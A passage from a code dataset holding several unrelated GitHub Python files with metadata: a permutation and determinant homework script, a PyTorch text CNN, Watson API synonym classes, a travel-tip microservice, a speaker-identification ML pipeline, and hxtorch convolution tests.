2:\r\n return self*(t*t)\r\n else:\r\n return t*t\r\n elif other == -1:\r\n res = [0 for i in range(self.n)]\r\n for i in range(self.n):\r\n res[self.a[i]] = i+1\r\n return Permutation(res)\r\n \r\n def __getitem__(self, index):\r\n return self.a[index-1]+1\r\n \r\n def __repr__(self):\r\n return \" \".join(str(i+1) for i in range(self.n)) + \"\\n\" + \" \".join(str(self.a[i]+1) for i in range(self.n))\r\n \r\n def evnss(self):\r\n # parity via inversion count: pairs i < j with a[i] > a[j]\r\n res = 0\r\n for j in range(self.n):\r\n for i in range(j):\r\n if self.a[i]>self.a[j]:\r\n res += 1\r\n return res%2\r\n\r\np1 = Permutation([3, 4, 8, 7, 2, 1, 5, 6])\r\np2 = Permutation([6, 4, 3, 7, 1, 8, 5, 2])\r\np3 = Permutation([5, 6, 7, 2, 3, 1, 4, 8])\r\np4 = (p1**15)*(p2**(-1))\r\np4 = p4**185\r\nx = (p4**(-1))*p3\r\n\r\nprint(\"2 задание:\\nx = \")\r\nprint(x)\r\nprint()\r\n\r\nprint(\"3 задание:\")\r\np = Permutation(list(range(6,186))+list(range(1,6)))\r\npe = p.evnss()\r\nprint(pe)\r\nif pe == 0:\r\n print(\"чётная\")\r\nelse:\r\n print(\"нечётная\")\r\nprint()\r\n\r\nfrom LinAlgFuncs import *\r\nfrom mySybolicCalcs import *\r\n\r\nx = Variable(\"x\")\r\n\r\nm = tensor_from_iterable([\r\n [0,x,0,6,0,0],\r\n [4,0,9,7,0,1],\r\n [x,9,x,x,0,7],\r\n [0,9,3,0,8,2],\r\n [0,x,x,4,7,8],\r\n [0,5,4,4,8,7]\r\n])\r\n\r\nprint(\"задание 4:\\ndet(m) =\", det_by_minors(m))","repo_name":"Vsevolod-pl/LinAlg","sub_path":"DZ2.py","file_name":"DZ2.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"18565350264","text":"#!/usr/bin/env python\n\n\"\"\"cnn: a PyTorch implementation of vanilla CNN. \"\"\"\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n__author__ = \"Yandi Xia\"\n\nCONFIG = {\n \"filter_sizes\": [3],\n \"num_filters\": 250,\n \"vocab_size\": None,\n \"emb_dim\": 300,\n \"hid_sizes\": [250],\n \"num_classes\": None,\n \"dropout_switches\": [True]\n}\n\n\nclass Net(nn.Module):\n \"\"\"A vanilla CNN model\"\"\"\n\n def __init__(self):\n for arg in CONFIG:\n self.__setattr__(arg, CONFIG[arg])\n assert len(self.hid_sizes) == len(self.dropout_switches)\n super(Net, self).__init__()\n self.lookup_table = nn.Embedding(self.vocab_size, self.emb_dim)\n self.init_embedding()\n self.encoders = []\n for i, filter_size in enumerate(self.filter_sizes):\n enc_attr_name = \"encoder_%d\" % i\n self.__setattr__(enc_attr_name,\n nn.Conv2d(in_channels=1,\n out_channels=self.num_filters,\n kernel_size=(filter_size, self.emb_dim)))\n self.encoders.append(self.__getattr__(enc_attr_name))\n self.hid_layers = []\n ins = len(self.filter_sizes) * self.num_filters\n for i, hid_size in enumerate(self.hid_sizes):\n hid_attr_name = \"hid_layer_%d\" % i\n self.__setattr__(hid_attr_name, nn.Linear(ins, hid_size))\n self.hid_layers.append(self.__getattr__(hid_attr_name))\n ins = hid_size\n self.logistic = nn.Linear(ins, self.num_classes)\n\n def forward(self, x):\n \"\"\"\n :param x:\n input x is in size of [N, C, H, W]\n N: batch size\n C: number of channel, in text case, this is 1\n H: height, in text case, this is the length of the text\n W: width, in text case, this is the dimension of the embedding\n :return:\n a tensor [N, L], where L is the number of classes\n \"\"\"\n n_idx = 0\n c_idx = 1\n h_idx = 2\n w_idx = 3\n # lookup table output size [N, H, W=emb_dim]\n x = self.lookup_table(x)\n # expand x to [N, 1, H, W=emb_dim]\n x = x.unsqueeze(c_idx)\n enc_outs = []\n for encoder in self.encoders:\n enc_ = F.relu(encoder(x))\n k_h = enc_.size()[h_idx]\n k_w 
= 1\n enc_ = F.max_pool2d(enc_, kernel_size=(k_h, k_w))\n enc_ = enc_.squeeze(w_idx)\n enc_ = enc_.squeeze(h_idx)\n enc_outs.append(enc_)\n # each of enc_outs size [N, C]\n encoding = torch.cat(enc_outs, 1)\n hid_in = encoding\n for hid_layer, do_dropout in zip(self.hid_layers, self.dropout_switches):\n hid_out = F.relu(hid_layer(hid_in))\n if do_dropout:\n hid_out = F.dropout(hid_out, training=self.training)\n hid_in = hid_out\n pred_prob = F.log_softmax(self.logistic(hid_in))\n return pred_prob\n\n def init_embedding(self):\n initrange = 0.1\n self.lookup_table.weight.data.uniform_(-initrange, initrange)\n","repo_name":"xiayandi/Pytorch_text_classification","sub_path":"cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":3144,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"27"} +{"seq_id":"25646377224","text":"from pywatson.util.map_initializable import MapInitializable\n\n\nclass SynSetSynonym(MapInitializable):\n def __init__(self, is_chosen, value, weight):\n self.is_chosen = is_chosen\n self.value = value\n self.weight = weight\n\n @classmethod\n def from_mapping(cls, syn_mapping):\n return cls(is_chosen=syn_mapping['isChosen'],\n value=syn_mapping['value'],\n weight=syn_mapping['weight'])\n\n\nclass SynSet(MapInitializable):\n def __init__(self, name, synonyms=()):\n self.name = name\n self.synonyms = tuple(synonyms)\n\n @classmethod\n def from_mapping(cls, synset_mapping):\n return cls(name=synset_mapping[0]['name'],\n synonyms=(SynSetSynonym.from_mapping(s) for s in synset_mapping[0]['synonym']))\n\n\nclass Synonym(MapInitializable):\n def __init__(self, part_of_speech, lemma, value, syn_set):\n self.part_of_speech = part_of_speech\n self.lemma = lemma\n self.value = value\n self.syn_set = syn_set\n\n @classmethod\n def from_mapping(cls, synonym_mapping):\n return cls(part_of_speech=synonym_mapping['partOfSpeech'],\n lemma=synonym_mapping['lemma'],\n value=synonym_mapping['value'],\n syn_set=SynSet.from_mapping(synonym_mapping['synSet']))\n","repo_name":"unhaltable/pywatson","sub_path":"pywatson/answer/synonym.py","file_name":"synonym.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"27"} +{"seq_id":"22578897513","text":"# much of this code was inspired by my microservice code from the first microservice assignment\r\n\r\nimport time\r\n\r\ncount = 0\r\ntips = [\r\n \"Wake up early to avoid crowds at sites and attractions.\",\r\n \"Learn a few key phrases in the local language to be able to communicate with people.\",\r\n \"Always pack a towel.\",\r\n \"Do some research before-hand; don't miss out on opportunities due to lack of planning!\",\r\n \"Always be willing to change plans if a new experience comes along!\"\r\n]\r\n\r\nwhile True:\r\n time.sleep(1)\r\n val = 'null'\r\n with open('travel-tip-service.txt', 'r', encoding='utf-8') as tipFile:\r\n val = tipFile.read()\r\n tipFile.close()\r\n\r\n if val == 'tip':\r\n with open('travel-tip-service.txt', 'w', encoding='utf-8') as tipFile:\r\n val = tips[count % 5]\r\n count += 1\r\n tipFile.write(val)\r\n tipFile.close()\r\n\r\n\r\n","repo_name":"stmii/CS361_Microservice","sub_path":"travel-tip.py","file_name":"travel-tip.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"39631628149","text":"# -*- coding: utf-8 -*-\n\"\"\"Speaker Identification\n\n\"\"\"\n\nimport numpy as np\nfrom 
numpy import loadtxt, array, vstack, mean, std\nfrom numpy.linalg import lstsq\nimport pandas as pd\nimport seaborn as sns\n\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import rgb2hex\nfrom matplotlib.cm import get_cmap\nimport matplotlib as mat\nfrom mpl_toolkits.mplot3d import Axes3D\n\nfrom sklearn.model_selection import cross_val_score, cross_val_predict, GridSearchCV\nfrom sklearn.utils import resample\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.svm import SVC\nfrom sklearn import svm\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn import metrics\n\nfrom keras.models import Sequential, load_model\nfrom keras.utils import to_categorical\nfrom keras.layers import (Dense, LSTM, Dropout)\nfrom keras_preprocessing.sequence import pad_sequences\n\nclass Utils():\n def __init__(self):\n pass\n\n def read_file(self, block_file, block_label_file=None, file_type='train'):\n if file_type == 'train':\n '''\n Read data from txt file into time series blocks (sequences)\n '''\n block_label_index = loadtxt(block_label_file, delimiter=\" \").tolist()\n file = open(block_file, \"r\")\n speaker_index = 0\n block_index = 0\n block = list()\n blocks = list()\n labels = list()\n for line in file.readlines():\n if line == '\\n':\n label = list()\n blocks.append(block)\n label.append(speaker_index)\n labels.append(label)\n block_index += 1\n block = list()\n if speaker_index <= 8 and block_index == block_label_index[speaker_index]:\n speaker_index += 1\n block_index = 0\n else:\n point_in_time = list()\n line = line.strip('\\n')\n for x in line.split(' ')[:12]:\n point_in_time.append(float(x))\n block.append(point_in_time)\n return blocks, labels\n else:\n '''\n Read test data from the file and store into time series blocks\n '''\n file = open(block_file, \"r\")\n speaker_index = 0\n block_index = 0\n block = list()\n blocks = list()\n for line in file.readlines():\n if line == '\\n':\n blocks.append(block)\n block_index += 1\n block = list()\n else:\n point_in_time = list()\n line = line.strip('\\n')\n for x in line.split(' ')[:12]:\n point_in_time.append(float(x))\n block.append(point_in_time)\n return blocks\n\n def pad_to_fixed_size_blocks(self, data_block, max_length, final_block_size):\n '''\n First pad last row till max length, then truncate it to fixed length size\n '''\n # Padding the sequence with the values in last row to max length\n fixed_size_block = []\n for block in data_block:\n block_len = len(block)\n last_row = block[-1]\n n = max_length - block_len\n\n to_pad = np.repeat(block[-1], n).reshape(12, n).transpose()\n new_block = np.concatenate([block, to_pad])\n fixed_size_block.append(new_block)\n\n final_dataset = np.stack(fixed_size_block)\n\n # truncate the sequence to final_block_size\n final_dataset = pad_sequences(final_dataset, maxlen=final_block_size, padding='post', dtype='float', truncating='post')\n\n return final_dataset\n\n def convert_to_vectors(self, data_block, block_label, final_block_size):\n '''\n Convert fixed size block to feature vectors for ML algorithms\n '''\n block_label = [i[0] for i in block_label]\n # print(block_label)\n vectors = list()\n n_features = 12\n for i in range(len(data_block)):\n block = data_block[i]\n vector = list()\n for row in range(1, final_block_size+1):\n for col in range(n_features):\n 
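# block[-row, col] reads rows from the end of the padded block, so the most\n # recent time steps come first in each flattened feature vector\n 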
vector.append(block[-row, col])\n\n vector.append(block_label[i])\n vectors.append(vector)\n vectors = array(vectors)\n vectors =vectors.astype('float32')\n return vectors\n \n def balance_classes(self, train_data):\n '''\n Balance the train data\n '''\n speaker_0 = train_data[train_data[:,-1] == 0]\n speaker_4 = train_data[train_data[:,-1] == 4]\n speaker_1 = train_data[train_data[:,-1] == 1]\n speaker_5 = train_data[train_data[:,-1] == 5]\n speaker_8 = train_data[train_data[:,-1] == 8]\n others = train_data[np.logical_or.reduce((train_data[:,-1] == 2, train_data[:,-1] == 3, train_data[:,-1] == 6, train_data[:,-1] == 7))]\n\n upsample_0 = resample(speaker_0, replace=True, n_samples=40, random_state=123)\n upsample_1 = resample(speaker_1, replace=True, n_samples=40, random_state=123)\n upsample_4 = resample(speaker_4, replace=True, n_samples=40, random_state=123)\n upsample_5 = resample(speaker_5, replace=True, n_samples=40, random_state=123)\n upsample_8 = resample(speaker_8, replace=True, n_samples=40, random_state=123)\n\n args = (others, upsample_0, upsample_1, upsample_4, upsample_5, upsample_8)\n balanced_train_data = np.concatenate(args)\n\n return balanced_train_data\n\nclass DisplayUtils():\n def display_lpc_distribution(self, train_blocks):\n '''\n Visualize all 12 lpc coefficients distribution over all blocks\n '''\n point_in_time = vstack(train_blocks)\n plt.figure(figsize=(10, 25))\n plt.title('LPC coefficients Distribution')\n coefficients = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11]\n for c in coefficients:\n plt.subplot(len(coefficients), 1, c + 1)\n plt.hist(point_in_time[:, c], bins=100)\n plt.savefig('lpc_coeff_dist.png')\n plt.show()\n\n def display_block_length_distribution(self, train_blocks):\n '''\n visualize the distribution of block length\n '''\n points_in_time = [len(x) for x in train_blocks]\n plt.title('Block Length Distribution')\n plt.hist(points_in_time, bins=25)\n plt.savefig('block_len_dist.png')\n plt.show()\n\n def lpc_scatter_plot(self, final_train_data):\n '''\n use scatter plot to visualize the grouping of users\n '''\n train_X, train_y = final_train_data[:, :-1], final_train_data[:, -1]\n colormap = get_cmap('viridis')\n colors = [rgb2hex(colormap(col)) for col in np.arange(0, 1.01, 1 / (6 - 1))]\n fig = plt.figure()\n ax = fig.gca(projection='3d')\n ax = Axes3D(fig)\n ax.scatter(train_X[:, 0], train_X[:, 1], train_X[:, 2], c=train_y, s=50, cmap=mat.colors.ListedColormap(colors))\n plt.title('Speaker Plot')\n plt.savefig('scatter_plot.png')\n plt.show()\n\n def display_lpc_time_series(self, speaker_blocks):\n '''\n visualize a block of lpc series for each speaker\n '''\n # group sequences by speaker\n speakers = [i + 1 for i in range(0,9)]\n speakers_voice = {}\n for speaker in speakers:\n speakers_voice[speaker] = [speaker_blocks[j] for j in range(len(speakers)) if speakers[j] == speaker]\n plt.figure(figsize=(10, 35))\n plt.title('LPC trend for each speaker')\n for i in speakers:\n plt.subplot(len(speakers), 1, i)\n coeff_series = vstack(speakers_voice[i][0])\n for j in [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11]:\n plt.plot(coeff_series[:, j], label='test')\n plt.title('Speaker ' + str(i), y=0, loc='left')\n plt.savefig('lpc_series.png')\n plt.show()\n\n def regress(self, y):\n X = array([i for i in range(len(y))]).reshape(len(y), 1)\n b = lstsq(X, y)[0][0]\n yhat = b * X[:, 0]\n return yhat\n\n def display_fitted_lpc_series(self, speaker_blocks):\n '''\n visualize a fitted lpc series for each speaker to see the trend\n '''\n speakers = [i + 1 for i in 
range(0,9)]\n speakers_voice = {}\n for speaker in speakers:\n speakers_voice[speaker] = [speaker_blocks[j] for j in range(len(speakers)) if speakers[j] == speaker]\n plt.figure(figsize=(10, 25))\n plt.title('LPC trend for each speaker')\n for i in speakers:\n plt.subplot(len(speakers), 1, i)\n coeff_series = vstack(speakers_voice[i][0])\n plt.plot(coeff_series[:, i])\n plt.plot(self.regress(coeff_series[:, i]))\n plt.title('Speaker ' + str(i), y=0, loc='left')\n plt.savefig('fitted_lpc_series.png')\n plt.show()\n\n def show_training_history(self, history):\n '''\n Show LSTM model training loss over each epoch\n '''\n plt.figure(figsize=(8, 6))\n plt.plot(history.history['loss'])\n plt.title('LSTM model training loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.savefig('lstm_train_error.png')\n plt.show()\n \n def display_class_distribution(self, train_block_label, disp_type=\"original\"):\n '''\n Show the class distribution\n '''\n unique, counts = np.unique(train_block_label, return_counts=True)\n label_counts = dict(zip(unique, counts))\n plt.figure(figsize=(10,6))\n sns.barplot(x = unique, y = counts)\n plt.title('Class distribution ('+disp_type+')')\n plt.xlabel('Class')\n plt.ylabel('Count')\n plt.savefig(disp_type+'class_distribution.png')\n plt.show()\n\nclass Models():\n def __init__(self):\n pass\n\n # Function to print result of the classifier\n def print_result(self, y_test, y_pred):\n '''\n print classification result (on train set)\n '''\n print(\"\\n\\n\")\n print(metrics.classification_report(y_test, y_pred))\n print(\"Confusion Matrix: \\n\\n\", metrics.confusion_matrix(y_test, y_pred))\n\n def save_prediction(self, test_X, predict, file_name):\n '''\n save prediction to the csv file\n '''\n predictions = []\n for block in range(0, len(test_X)):\n predictions.append([block,int(predict[block])])\n submission = pd.DataFrame(predictions, columns=['block_num', 'prediction'])\n submission.to_csv(file_name, header=['block_num','prediction'], index=None, sep=',')\n\n def build_train_lstm_model(self, trainX, trainy):\n '''\n build lstm model and train\n '''\n trainy = to_categorical(trainy)\n verbose, epochs, batch_size = 2, 150, 64\n n_timesteps, n_features, n_outputs = trainX.shape[1], trainX.shape[2], trainy.shape[1]\n model = Sequential()\n model.add(LSTM(100, input_shape=(n_timesteps, n_features)))\n model.add(Dropout(0.5))\n model.add(Dense(100, activation='relu'))\n model.add(Dense(n_outputs, activation='softmax'))\n model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n # fit network\n history = model.fit(trainX, trainy, epochs=epochs, batch_size=batch_size, verbose=verbose)\n model.save('lstm_model.h5')\n return history\n\n def lstm_predict(self, testX):\n '''\n load the saved model and predict the class for test data\n '''\n model = load_model('lstm_model.h5')\n predict_classes = []\n for pred in model.predict(testX):\n predict_classes.append(np.argmax(pred))\n\n return np.array(predict_classes)\n\n def compare_ml_models(self, train_X, train_y, nfold):\n '''\n Initial experimentation on several algorithms\n '''\n models, names = list(), list()\n # knn\n models.append(KNeighborsClassifier())\n names.append('KNN')\n # logistic\n models.append(LogisticRegression(solver='lbfgs', multi_class='auto', max_iter=200))\n names.append('LR')\n # cart\n models.append(DecisionTreeClassifier())\n names.append('CART')\n # svm\n models.append(SVC())\n names.append('SVM')\n # random forest\n models.append(RandomForestClassifier(n_estimators=100))\n 
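# each candidate below is wrapped in a StandardScaler + model Pipeline before\n # k-fold scoring, so feature scaling is re-fit inside every CV split\n 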
names.append('RF')\n # evaluate models\n\n all_scores = list()\n for i in range(len(models)):\n s = StandardScaler()\n p = Pipeline(steps=[('s', s), ('m', models[i])])\n scores = cross_val_score(p, train_X, train_y, scoring='accuracy', cv=nfold, n_jobs=-1)\n all_scores.append(scores)\n m, s = mean(scores) * 100, std(scores) * 100\n print('%s %.3f%% +/-%.3f' % (names[i], m, s))\n\n return all_scores, names\n\n def svm_parameter_tuning(self, train_X, train_y, nfold):\n '''\n find best parameter for svm\n '''\n param_grid = {'C': [0.001, 0.01, 0.1, 1, 10], 'gamma': [0.001, 0.01, 0.1, 1], 'kernel':['rbf','linear']}\n grid_search = GridSearchCV(svm.SVC(), param_grid, cv=nfold, verbose=1)\n grid_search.fit(train_X, train_y)\n grid_search.best_params_\n\n scores = cross_val_score(grid_search.best_estimator_, train_X, train_y, scoring='accuracy', cv=nfold, n_jobs=-1)\n m, s = mean(scores) * 100, std(scores) * 100\n print('%s %.3f%% +/-%.3f' % ('SVM fine tuned', m, s))\n\n\n return grid_search.best_params_, grid_search.best_estimator_\n\n\n \n\n def test_best_model(self, best_estimator, train_X, train_y):\n '''\n Test the best model\n '''\n y_pred = cross_val_predict(best_estimator, train_X, train_y, cv=5)\n print(\"Performance by SVM (with best estimator) in test data using cross-val...\\n\\n\")\n self.print_result(train_y, y_pred)\n\n def classify_test_data(self, best_estimator, train_X, train_y, test_X):\n '''\n Classify test data using best svm settings\n '''\n best_estimator.fit(train_X, train_y)\n predict = best_estimator.predict(test_X)\n return predict\n\n def run_classification_models(self, train_data, test_data):\n '''\n use traditional machine learning approach\n '''\n train_X, train_y = train_data[:,:-1], train_data[:,-1]\n test_X, test_y = test_data[:, :-1], test_data[:, -1]\n nfold = 5\n\n print(\"Running Algorithms for Spot Checking ... \\n\\n\")\n all_scores, names = self.compare_ml_models(train_X, train_y, nfold)\n\n # # Visualize boxplot to see the best model\n plt.boxplot(all_scores, labels=names)\n # pyplot.show()\n plt.savefig('spot_check_box_plot.png')\n\n # Since SVM shows the best performance.. Let's tune the parameter for SVM and find the best model\n print(\"Running Grid Search for the Best Algorithm (SVM) ... 
\\n\\n\")\n best_param, best_estimator = self.svm_parameter_tuning(train_X, train_y, nfold)\n print(\"Best Parameters: \", best_param)\n print(\"\\n\\nBest Estimators: \", best_estimator)\n\n # test the performance of best svm model\n self.test_best_model(best_estimator, train_X, train_y)\n print(\"Predicting Speakers.....\\n\\n\")\n #predict the speaker for test data using best svm model\n predict = self.classify_test_data(best_estimator, train_X, train_y, test_X)\n self.save_prediction(test_X, predict, 'submission.csv')\n\n def run_LSTM_model(self, trainX, trainy, testX):\n '''\n use lstm based classifer for speaker classification\n '''\n # build and train LSTM Model\n print(\"\\n\\nTraining LSTM....\\n\\n\")\n history = self.build_train_lstm_model(trainX, trainy)\n\n # visualize the training error and convergence of LSTM\n display = DisplayUtils()\n display.show_training_history(history)\n\n #predict the speaker using\n predict = self.lstm_predict(testX)\n self.save_prediction(testX, predict, 'submission_lstm.csv')\n\nutils = Utils()\n\ntrain_data = 'train.txt'\ntest_data = 'test.txt'\ntrain_label = 'train_block_labels.txt'\n\n# load data\nprint(\"Loading Data\\n\\n\")\ntrain_block, train_block_label = utils.read_file(block_file = train_data, block_label_file = train_label, file_type='train')\ntest_block = utils.read_file(block_file = test_data, file_type='test')\n\n# explore data, do some visualization\nprint(\"Exploring Data\\n\\n\")\ndisplay = DisplayUtils()\n\n# histogram for the lpc coefficient distribution\ndisplay.display_lpc_distribution(train_block)\n\n# histogram for the block length (or point of time) distribution\ndisplay.display_block_length_distribution(train_block)\n\n# plot one block of lpc coefficient for each speaker to look at the pattern of voice frequency\ndisplay.display_lpc_time_series(train_block)\ndisplay.display_fitted_lpc_series(train_block)\n\nmax_length = 29\nfinal_block_size = 18\n\nprint(\"Data Preprocessing (padding to fixed size blocks)\\n\\n\")\n# Take the best lengths (18), truncate the longer block, and pad the shorter block by the last row\ntrain_data = utils.pad_to_fixed_size_blocks(train_block, max_length, final_block_size)\ntest_data = utils.pad_to_fixed_size_blocks(test_block, max_length, final_block_size)\n\n# dummy test label for convenience\ntest_block_label = [[i] for i in np.zeros(len(test_data))]\n\nprint(\"Generating Features (for ML Algorithms)\\n\\n\")\n\n# Generate fixed length feature vector for traditional machine learning input\nfinal_train_data = utils.convert_to_vectors(train_data, train_block_label, final_block_size)\nfinal_test_data = utils.convert_to_vectors(test_data, test_block_label, final_block_size)\n\n\n# Class distribution before balancing\ndisplay.display_class_distribution(final_train_data[:,-1], disp_type='orginal')\n\n\nprint(\"Before balancing\")\nmodel = Models()\nmodel.run_classification_models(final_train_data, final_test_data)\n\n# Balancing the classes for training\nfinal_train_data = utils.balance_classes(final_train_data)\n\n# Class distribution after balancing\ndisplay.display_class_distribution(final_train_data[:,-1], disp_type='balanced')\n\n# Scatter plot to figure if there is any grouping based on feature vector\ndisplay.lpc_scatter_plot(final_train_data)\n\n# It appears that there is clustering, so classifying with few algorithms\nmodel = Models()\nmodel.run_classification_models(final_train_data, final_test_data)\n\nprint(\"SVM Prediction Saved (see 'submission.csv' )\\n\\n\")\n\n# Also try LSTM for 
classification\nmodel.run_LSTM_model(np.array(train_data), np.array(train_block_label), np.array(test_data))\nprint(\"LSTM Prediction Saved (see 'submission_lstm.csv' )\\n\\n\")","repo_name":"5Isha6/Speech-Identification","sub_path":"speaker_identification.py","file_name":"speaker_identification.py","file_ext":"py","file_size_in_byte":18601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"71459577352","text":"from abc import ABC, abstractmethod\nfrom collections import namedtuple\nfrom functools import partial\nfrom typing import ClassVar, Dict\nimport math\nimport unittest\nimport torch\nimport hxtorch\nfrom hxtorch import logger\n\nfrom hxtorch_shared_test_tools import rand_full\n\nlogger.default_config(level=logger.LogLevel.INFO)\nlogger.set_loglevel(logger.get(\"grenade\"), logger.LogLevel.WARN)\n\n\nclass ConvInput(namedtuple('ConvInput', [\"input\", \"weight\", \"bias\", \"stride\"],\n defaults=[None, 1])):\n \"\"\"\n An input to a convolution operation.\n \"\"\"\n def duplicate(self):\n return self._make(arg.data.clone().requires_grad_()\n if hasattr(arg, \"requires_grad\") else arg\n for arg in self)\n\n\nclass TestConv(ABC, unittest.TestCase):\n \"\"\"\n Tests a conv operation.\n \"\"\"\n gain: ClassVar[float] = 1.\n\n @abstractmethod\n def conv(**kwargs):\n raise NotImplementedError\n\n @abstractmethod\n def torch_conv(**kwargs):\n raise NotImplementedError\n\n test_inputs: ClassVar[Dict[str, ConvInput]]\n\n def test_output_shape_gradient(self):\n \"\"\"\n Compares the output shape and gradients of the operation to the output\n of the torch implementation for different input arguments.\n \"\"\"\n log = hxtorch.logger.get(self.__class__.__name__)\n\n for mode in self.test_inputs:\n with self.subTest(mode=mode):\n conv_input = self.test_inputs[mode].duplicate()\n result = self.conv(**conv_input._asdict())\n log.info(f\"Mean output: {result.mean():.1f}\")\n\n self.assertTrue(result.is_contiguous())\n\n conv_input_torch = conv_input.duplicate()\n result_torch = self.torch_conv(**conv_input_torch._asdict())\n self.assertEqual(result.size(), result_torch.size())\n\n # compute gradients\n result.backward(torch.ones_like(result))\n result_torch.backward(torch.ones_like(result_torch))\n\n for name, arg in conv_input._asdict().items():\n if hasattr(arg, \"grad\"):\n grad = arg.grad\n grad_torch = getattr(conv_input_torch, name).grad\n if name != \"bias\":\n grad_torch *= self.gain\n self.assertTrue(\n torch.allclose(grad, grad_torch, rtol=.001),\n f\"{name.capitalize()} gradient does not match:\\n\"\n f\"{grad}\\n!=\\n{grad_torch}\"\n f\"\\ndiff:\\n{grad - grad_torch}\")\n\n\nclass TestConv1d(TestConv):\n \"\"\"\n Tests the conv1d operation.\n \"\"\"\n\n conv = torch.conv1d\n torch_conv = torch.conv1d\n\n test_inputs = {\n \"batch1_outchannels1_inchannels1_kernel_larger_stride\":\n ConvInput(rand_full((3, 1, 30), 25.), rand_full((1, 1, 5), 50.),\n stride=7),\n \"expanded_full_synram\":\n ConvInput(rand_full((2, 1, 128), 10.), rand_full((14, 1, 43), 15.),\n bias=torch.full((14,), 1.).requires_grad_(), stride=5),\n \"expanded_overfull_synram\":\n ConvInput(rand_full((2, 1, 138), 10.), rand_full((14, 1, 43), 15.),\n bias=torch.full((14,), 1.).requires_grad_(), stride=5),\n }\n\n kernel_size = 5\n for n_batches in [2, 4]:\n for n_input_channels in [1, 3, 5]:\n for n_output_channels in [1, 4]:\n for stride in [7, 4, 2]:\n test_inputs.update({\n f\"batch{n_batches}_outchannels{n_output_channels}_\"\n + 
f\"inchannels{n_input_channels}_kernel{kernel_size}_\"\n + f\"stride{stride}\": ConvInput(\n rand_full((n_batches, n_input_channels, 30), 10.),\n rand_full((n_output_channels, n_input_channels,\n kernel_size), 50.),\n stride=stride)})\n\n\nclass TestConv1dHX(TestConv1d):\n \"\"\"\n Tests the conv1d operation on HX.\n \"\"\"\n conv = hxtorch.perceptron.conv1d\n\n @classmethod\n def setUpClass(cls):\n hxtorch.init_hardware(ann=True)\n mock_parameter = hxtorch.perceptron.measure_mock_parameter()\n hxtorch.perceptron.set_mock_parameter(mock_parameter)\n cls.gain = mock_parameter.gain\n\n @classmethod\n def tearDownClass(cls):\n hxtorch.release_hardware()\n\n\nclass TestConv1dHXmock(TestConv1d):\n \"\"\"\n Tests the mocked conv1d operation.\n \"\"\"\n conv = partial(hxtorch.perceptron.conv1d, mock=True)\n\n @classmethod\n def setUpClass(cls):\n mock_parameter = hxtorch.perceptron.MockParameter()\n hxtorch.perceptron.set_mock_parameter(mock_parameter)\n cls.gain = mock_parameter.gain\n\n\nclass TestExpandedConv1d(TestConv1d):\n \"\"\"\n Tests the conv1d operation.\n\n :cvar num_expansions: Number of expansions of the conv1d operation.\n Number of times the convolution kernel is placed side by side\n in the synapse matrix, shifted by the convolution's stride.\n \"\"\"\n\n num_expansions = 18\n conv = partial(\n hxtorch.perceptron.expanded_conv1d, num_expansions=num_expansions,\n num_sends=4, mock=True)\n\n @classmethod\n def setUpClass(cls):\n mock_parameter = hxtorch.perceptron.MockParameter(gain=0.0015, noise_std=0)\n hxtorch.perceptron.set_mock_parameter(mock_parameter)\n cls.gain = mock_parameter.gain * 4\n\n def test_compare_outputs(self):\n \"\"\"\n Compares the outputs of the expanded conv1d operation to the outputs\n of the normal conv1d operation.\n \"\"\"\n for mode in self.test_inputs:\n with self.subTest(mode=mode):\n conv_input = self.test_inputs[mode].duplicate()\n result_expanded = self.conv(**conv_input._asdict())\n result = hxtorch.perceptron.conv1d(\n num_sends=4, mock=True, **conv_input._asdict())\n\n # calculate how many synrams are filled with the given\n # operation, each will run as its own MAC operation and\n # will result in a rounding error up to 1.\n\n # size limitation in terms of height, caused by inputs:\n n_input_channels = self.test_inputs[mode].input.size()[1]\n kernel_size = self.test_inputs[mode].weight.size()[2]\n stride = self.test_inputs[mode].stride\n\n n_synapse_matrices = math.ceil(\n ((n_input_channels * stride * self.num_expansions)\n + kernel_size) / hxtorch.perceptron.constants.hardware_matrix_height)\n\n # size limitation in terms of width, caused by outputs:\n n_output_channels = self.test_inputs[mode].weight.size()[0]\n n_synapse_matrices = max(\n n_synapse_matrices,\n math.ceil(n_output_channels\n / hxtorch.perceptron.constants.hardware_matrix_width))\n\n self.assertTrue(\n torch.allclose(result_expanded, result,\n atol=n_synapse_matrices),\n \"Results do not match:\\n\"\n f\"{result_expanded}\\n!=\\n{result}\")\n\n\nclass TestConv2d(TestConv):\n \"\"\"\n Tests the conv2d operation.\n \"\"\"\n conv = torch.conv2d\n torch_conv = torch.conv2d\n\n test_inputs = {\n \"batch1_outchannels1_inchannels1_kernel_larger_stride\":\n ConvInput(rand_full((1, 1, 30, 60), 25.), rand_full((1, 1, 5, 10), 20),\n stride=(7, 14)),\n \"batch2_outchannels1_inchannels3_kernel_larger_stride\":\n ConvInput(rand_full((2, 3, 30, 60), 10.), rand_full((1, 3, 5, 10), 20),\n stride=(7, 14)),\n \"batch2_outchannels4_inchannels3_kernel_larger_stride\":\n ConvInput(rand_full((2, 3, 
